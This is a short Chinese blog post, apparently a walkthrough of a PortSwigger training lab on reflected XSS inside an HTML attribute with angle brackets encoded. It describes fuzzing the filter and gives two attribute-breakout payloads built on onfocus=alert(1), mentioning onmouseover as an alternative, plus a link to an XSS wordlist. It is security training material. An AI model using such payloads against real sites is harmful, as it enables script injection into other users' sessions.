burpsuite靶场----XSS----反射型2----过滤尖括号

靶场地址

https://portswigger.net/web-security/cross-site-scripting/contexts/lab-attribute-angle-brackets-html-encoded

XSS字典

链接：https://pan.baidu.com/s/1XAJbEc4o824zAAmvV85TOA
提取码：1234

正式开始

1.经过模糊测试,发现过滤了尖括号
2.再查看源码,发现是input标签

3.使用payload,除了onfocus还可以使用on的其他事件,比如onmouseover等等
a" onfocus=alert(1)//
a" onfocus="alert(1)

posted @ 2023-08-19 15:52 BattleofZhongDinghe 阅读(151) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部